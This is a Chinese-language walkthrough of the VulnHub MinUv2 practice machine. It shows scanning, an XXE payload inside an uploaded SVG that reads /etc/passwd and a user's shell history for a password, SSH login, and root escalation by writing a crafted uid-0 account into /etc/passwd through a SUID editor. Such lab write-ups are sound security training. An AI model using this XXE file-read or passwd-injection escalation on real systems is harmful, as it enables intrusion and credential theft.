本周实践的是vulnhub的MinUv2镜像,
下载地址,https://download.vulnhub.com/minu/MinUv2.ova.7z,
用virtualbox导入成功,
做地址扫描,sudo netdiscover -r 192.168.0.0/24,
获取到靶机地址是192.168.0.195,
接着做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.0.195,
发现靶机开了22端口的ssh服务和3306端口的http服务,
对http服务做路径暴破,dirb http://192.168.0.195:3306 -X .html,
获取到http://192.168.0.195:3306/upload.html,
浏览器访问http://192.168.0.195:3306/upload.html,
发现文件上传入口,只能上传.svg文件,
搜索相关漏洞利用方法,svg file exploitdb,
其中有个链接https://portswigger.net/web-security/xxe,
在里面获取到漏洞利用的脚本,
把脚本保存到file.svg,上传,获取到靶机的密码文件内容,
获取到/home/employee:/bin/ash,修改脚本,
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///home/employee/.ash_history"> ]>
<stockCheck><productId>&xxe;</productId></stockCheck>
再次上传,获取到employee账号的密码superultrapass3,
登录,ssh [email protected],
查找root权限程序,find / -perm -u=s -type f 2>/dev/null,
获取到/usr/bin/micro,
准备一个root权限的账号密码,
hacker:sa3tHJ3/KuYvI:0:0:hacker:/root:/bin/ash,
添加到/etc/passwd文件中,cat /etc/passwd | /usr/bin/micro,
切换到hacker账号,su hacker,密码是password,id确认是root,
原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之MinUv2的实践
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论